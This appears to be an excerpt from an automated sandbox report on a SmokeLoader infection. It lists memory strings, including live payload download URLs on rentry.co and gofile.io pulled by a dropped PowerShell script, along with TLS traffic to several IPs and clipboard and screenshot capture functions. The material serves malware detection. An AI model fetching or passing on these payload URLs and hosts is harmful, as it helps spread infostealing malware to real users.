Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A35DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2083945040.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/microgods/raw
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A367D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36836000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4510548648.0000022A4D393000.00000004.00000020.00020000.00000000.sdmp, rentry-script.ps1.11.dr String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.11.dr String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 6E8A.exe.2.dr String found in binary or memory: https://www.ssl.com/repository0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51828
Source: unknown Network traffic detected: HTTP traffic on port 51828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51820
Source: unknown Network traffic detected: HTTP traffic on port 51881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51829
Source: unknown Network traffic detected: HTTP traffic on port 51852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51836
Source: unknown Network traffic detected: HTTP traffic on port 51869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51837
Source: unknown Network traffic detected: HTTP traffic on port 51875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51849
Source: unknown Network traffic detected: HTTP traffic on port 51874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51848
Source: unknown Network traffic detected: HTTP traffic on port 51868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51840
Source: unknown Network traffic detected: HTTP traffic on port 51812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51855
Source: unknown Network traffic detected: HTTP traffic on port 51903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51859
Source: unknown Network traffic detected: HTTP traffic on port 51829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51851
Source: unknown Network traffic detected: HTTP traffic on port 51920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51900
Source: unknown Network traffic detected: HTTP traffic on port 51847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51904
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51902
Source: unknown Network traffic detected: HTTP traffic on port 51876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51903
Source: unknown Network traffic detected: HTTP traffic on port 51899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51907
Source: unknown Network traffic detected: HTTP traffic on port 51871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51910
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51913
Source: unknown Network traffic detected: HTTP traffic on port 51865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51917
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51918
Source: unknown Network traffic detected: HTTP traffic on port 51813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51923
Source: unknown Network traffic detected: HTTP traffic on port 51870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51920
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51924
Source: unknown Network traffic detected: HTTP traffic on port 51893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51928
Source: unknown Network traffic detected: HTTP traffic on port 51902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51813
Source: unknown Network traffic detected: HTTP traffic on port 51898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51815
Source: unknown Network traffic detected: HTTP traffic on port 51842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51865
Source: unknown Network traffic detected: HTTP traffic on port 51904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51866
Source: unknown Network traffic detected: HTTP traffic on port 51891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51860
Source: unknown Network traffic detected: HTTP traffic on port 51910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51862
Source: unknown Network traffic detected: HTTP traffic on port 51862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51878
Source: unknown Network traffic detected: HTTP traffic on port 51896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51877
Source: unknown Network traffic detected: HTTP traffic on port 51844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51875
Source: unknown Network traffic detected: HTTP traffic on port 51915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51873
Source: unknown Network traffic detected: HTTP traffic on port 51851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51889
Source: unknown Network traffic detected: HTTP traffic on port 51822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51887
Source: unknown Network traffic detected: HTTP traffic on port 51845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51880
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51883
Source: unknown Network traffic detected: HTTP traffic on port 51916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51884
Source: unknown Network traffic detected: HTTP traffic on port 51890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51899
Source: unknown Network traffic detected: HTTP traffic on port 51873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51894
Source: unknown Network traffic detected: HTTP traffic on port 51878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51884 -> 443
Source: unknown HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:51812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.5:51821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.5:51837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.5:51842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51886 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51896 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality for read data from the clipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004EED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 14_2_004EED00
Contains functionality to read the clipboard data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004EED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 14_2_004EED00
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004EFB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 14_2_004EFB2F

Spam, unwanted Advertisements and Ransom Demands
barindex
Reads the Security eventlog
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
